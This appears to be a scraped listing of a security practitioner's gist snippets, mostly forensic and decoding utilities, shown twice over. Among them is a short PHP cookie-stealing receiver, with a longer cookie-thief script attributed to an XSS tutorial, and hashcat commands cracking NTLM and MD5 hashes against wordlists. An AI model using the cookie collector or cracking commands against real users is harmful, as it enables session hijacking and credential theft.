BBK BeanBagKing

## decode.sh
#!/bin/bash

string=$1
YEL='\033[1;33m'
NC='\033[0m' # No Color

if [ -z $string ]; then
    echo "Usage: `basename $0` [BASE64 STRING]"
    exit 1
fi

## new_setup.sh
#!/bin/bash

YEL='\033[1;33m'
RED='\033[1;31m'
GRN='\033[1;32m'
NC='\033[0m' # No Color

# This script assumes you've already taken the necessary initial steps to setup network connectivity and install vmware tools
# You probably want at least open-vm-tools-desktop to copy and paste this script and/or the URL to wget it.
echo -e "${YEL}--${NC}Starting script, installing commonly used programs"

## cookie_thief.php
<?php

// I've seen this code in several articles, the earliest of which that I've seen is here:
// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
// This is just a copy with correct formatting (no curly quotes) and source attribution.
// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
// and added proper line breaks.

function GetIP()
{

## simple_cookie.php
<?php
$cookie = $_GET["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>

## hunting.sh
# Linux - Look for attempts to hide files (note the spaces)
find / \( -name '. ' -o -name '.. ' -o -name '...' -o -name ' ' \)

# Linux - Find last 20 modified files
### Excluded directoreis for /proc, /sys
### Excludes /tmp/sort* as these are used by this process
##### Exclude directory - find . -type d \( -path dir1 -o -path dir2 -o -path dir3 \) -prune -o -print
find / -type d \( -path /proc -o -path /sys \) -prune -o -print -type f ! -wholename "/tmp/sort*" -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head

# Find 20 largest files

## urldecode.py
#!/usr/bin/python

import urllib

fin = open("urlencoded.txt")
fout = open("urldecoded.txt", "wt")
for line in fin:
    fout.write(urllib.unquote(line))
fin.close()
fout.close()

## streams.py
#!/usr/bin/python

# Takes multiple pcap files (packet*.pcap) and...
### Combines them into one pcap (combined.pcap)
### Detects the number of TCP streams
### For each stream, converts it to ascii and stores them in order in a file (encoded_streams.txt)
### Converts URL (percent encoded) values to plaintext equivalent (decoded_streams.txt)

# Run this in the same directory as your packet*.pcap files

## hashcat_help.txt
hashcat64.exe -a 0 -w 0 -m 1000 -r rules/lmNTLM.rule hashes/ntlm.txt lists/lab.txt
hashcat64.exe -a 0 -w 1 -m 1800 hashes/unixmd5.txt lists/rockyou.txt
hashcat64.exe -a 3 -w 1 -m 1800 --increment ?a?a?a?a?a hashes/unixmd5.txt


C:\hashcat-3.10>hashcat64.exe -h
hashcat, advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...

## john_help.txt
root@kali:~# john -h
John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-64-avx]
Copyright (c) 1996-2015 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION]        "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
                  --pipe  like --stdin, but bulk reads, and allows rules
--loopback[=FILE]         like --wordlist, but fetch words from a .pot file

## diffi.sh
#!/bin/bash

# diffi - Better diff output script
# BeanBagKing - https://gist.github.com/BeanBagKing

# If both arguments aren't given, print help text
if [ -z $1 ] || [ -z $2 ]; then
    echo "Usage: `basename $0` [OLD] [NEW]"
    exit 1
fi
	#!/bin/bash

	string=$1
	YEL='\033[1;33m'
	NC='\033[0m' # No Color

	if [ -z $string ]; then
	echo "Usage: `basename $0` [BASE64 STRING]"
	exit 1
	fi
	#!/bin/bash

	YEL='\033[1;33m'
	RED='\033[1;31m'
	GRN='\033[1;32m'
	NC='\033[0m' # No Color

	# This script assumes you've already taken the necessary initial steps to setup network connectivity and install vmware tools
	# You probably want at least open-vm-tools-desktop to copy and paste this script and/or the URL to wget it.
	echo -e "${YEL}--${NC}Starting script, installing commonly used programs"
	<?php

	// I've seen this code in several articles, the earliest of which that I've seen is here:
	// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
	// This is just a copy with correct formatting (no curly quotes) and source attribution.
	// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
	// and added proper line breaks.

	function GetIP()
	{
	<?php
	$cookie = $_GET["cookie"];
	$steal = fopen("cookiefile.txt", "a");
	fwrite($steal, $cookie ."\n");
	fclose($steal);
	?>
	# Linux - Look for attempts to hide files (note the spaces)
	find / \( -name '. ' -o -name '.. ' -o -name '...' -o -name ' ' \)

	# Linux - Find last 20 modified files
	### Excluded directoreis for /proc, /sys
	### Excludes /tmp/sort* as these are used by this process
	##### Exclude directory - find . -type d \( -path dir1 -o -path dir2 -o -path dir3 \) -prune -o -print
	find / -type d \( -path /proc -o -path /sys \) -prune -o -print -type f ! -wholename "/tmp/sort*" -exec stat --format '%Y :%y %n' "{}" \; \| sort -nr \| cut -d: -f2- \| head

	# Find 20 largest files
	#!/usr/bin/python

	import urllib

	fin = open("urlencoded.txt")
	fout = open("urldecoded.txt", "wt")
	for line in fin:
	fout.write(urllib.unquote(line))
	fin.close()
	fout.close()
	#!/usr/bin/python

	# Takes multiple pcap files (packet*.pcap) and...
	### Combines them into one pcap (combined.pcap)
	### Detects the number of TCP streams
	### For each stream, converts it to ascii and stores them in order in a file (encoded_streams.txt)
	### Converts URL (percent encoded) values to plaintext equivalent (decoded_streams.txt)

	# Run this in the same directory as your packet*.pcap files
	hashcat64.exe -a 0 -w 0 -m 1000 -r rules/lmNTLM.rule hashes/ntlm.txt lists/lab.txt
	hashcat64.exe -a 0 -w 1 -m 1800 hashes/unixmd5.txt lists/rockyou.txt
	hashcat64.exe -a 3 -w 1 -m 1800 --increment ?a?a?a?a?a hashes/unixmd5.txt


	C:\hashcat-3.10>hashcat64.exe -h
	hashcat, advanced password recovery

	Usage: hashcat [options]... hash\|hashfile\|hccapfile [dictionary\|mask\|directory]...
	root@kali:~# john -h
	John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-64-avx]
	Copyright (c) 1996-2015 by Solar Designer and others
	Homepage: http://www.openwall.com/john/

	Usage: john [OPTIONS] [PASSWORD-FILES]
	--single[=SECTION] "single crack" mode
	--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
	--pipe like --stdin, but bulk reads, and allows rules
	--loopback[=FILE] like --wordlist, but fetch words from a .pot file
	#!/bin/bash

	# diffi - Better diff output script
	# BeanBagKing - https://gist.github.com/BeanBagKing

	# If both arguments aren't given, print help text
	if [ -z $1 ] \|\| [ -z $2 ]; then
	echo "Usage: `basename $0` [OLD] [NEW]"
	exit 1
	fi